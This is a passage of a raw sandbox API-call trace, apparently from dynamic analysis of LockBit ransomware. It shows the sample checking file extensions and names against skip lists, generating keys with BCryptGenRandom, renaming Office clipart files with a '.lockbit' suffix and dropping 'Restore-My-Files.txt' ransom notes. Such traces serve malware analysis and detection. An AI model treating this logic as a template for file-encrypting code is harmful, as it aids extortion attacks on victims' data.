(lpString1=".ckp", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.785] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.786] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.786] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF.lockbit") returned 72 [0150.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200183.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.787] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.787] malloc (_Size=0x40068) returned 0x3d70450 [0150.787] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5312) returned 1 [0150.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.789] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.794] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.794] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.794] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.795] free (_Block=0x1fa2ed8) [0150.795] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.795] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.795] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.795] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200189.WMF", cAlternateFileName="")) returned 1 [0150.796] lstrcmpiW (lpString1=".", lpString2="J0200189.WMF") returned -1 [0150.796] lstrcmpiW (lpString1="..", lpString2="J0200189.WMF") returned -1 [0150.796] PathFindExtensionW (pszPath="J0200189.WMF") returned=".WMF" [0150.796] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.796] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.797] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.797] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200189.WMF") returned 1 [0150.798] lstrcmpiW (lpString1="ntldr", lpString2="J0200189.WMF") returned 1 [0150.798] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200189.WMF") returned 1 [0150.798] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200189.WMF") returned -1 [0150.798] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200189.WMF") returned -1 [0150.798] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200189.WMF") returned 1 [0150.798] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200189.WMF") returned -1 [0150.798] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.798] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF") returned=".WMF" [0150.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.798] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.798] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.799] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.799] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF.lockbit") returned 72 [0150.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200189.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.800] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.800] malloc (_Size=0x40068) returned 0x3df0008 [0150.800] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8060) returned 1 [0150.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.802] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.810] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.810] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.810] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.811] free (_Block=0x1fa2ed8) [0150.811] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.811] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.812] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa65cc000, ftCreationTime.dwHighDateTime=0x1be3e98, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa65cc000, ftLastWriteTime.dwHighDateTime=0x1be3e98, nFileSizeHigh=0x0, nFileSizeLow=0x7a46, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200273.WMF", cAlternateFileName="")) returned 1 [0150.812] lstrcmpiW (lpString1=".", lpString2="J0200273.WMF") returned -1 [0150.812] lstrcmpiW (lpString1="..", lpString2="J0200273.WMF") returned -1 [0150.812] PathFindExtensionW (pszPath="J0200273.WMF") returned=".WMF" [0150.812] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.812] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.813] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.813] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.814] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200273.WMF") returned 1 [0150.814] lstrcmpiW (lpString1="ntldr", lpString2="J0200273.WMF") returned 1 [0150.814] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200273.WMF") returned 1 [0150.814] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200273.WMF") returned -1 [0150.814] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200273.WMF") returned -1 [0150.814] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200273.WMF") returned 1 [0150.815] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200273.WMF") returned -1 [0150.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF") returned=".WMF" [0150.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.815] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.815] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.816] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.816] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF.lockbit") returned 72 [0150.816] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200273.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.817] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.817] malloc (_Size=0x40068) returned 0x3ef0008 [0150.817] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=31302) returned 1 [0150.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0150.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0150.819] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.824] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.824] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.824] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.825] free (_Block=0x1fa2ed8) [0150.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.826] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.826] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f04700, ftCreationTime.dwHighDateTime=0x1be3e98, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9f04700, ftLastWriteTime.dwHighDateTime=0x1be3e98, nFileSizeHigh=0x0, nFileSizeLow=0x4c0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200279.WMF", cAlternateFileName="")) returned 1 [0150.826] lstrcmpiW (lpString1=".", lpString2="J0200279.WMF") returned -1 [0150.826] lstrcmpiW (lpString1="..", lpString2="J0200279.WMF") returned -1 [0150.826] PathFindExtensionW (pszPath="J0200279.WMF") returned=".WMF" [0150.826] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW 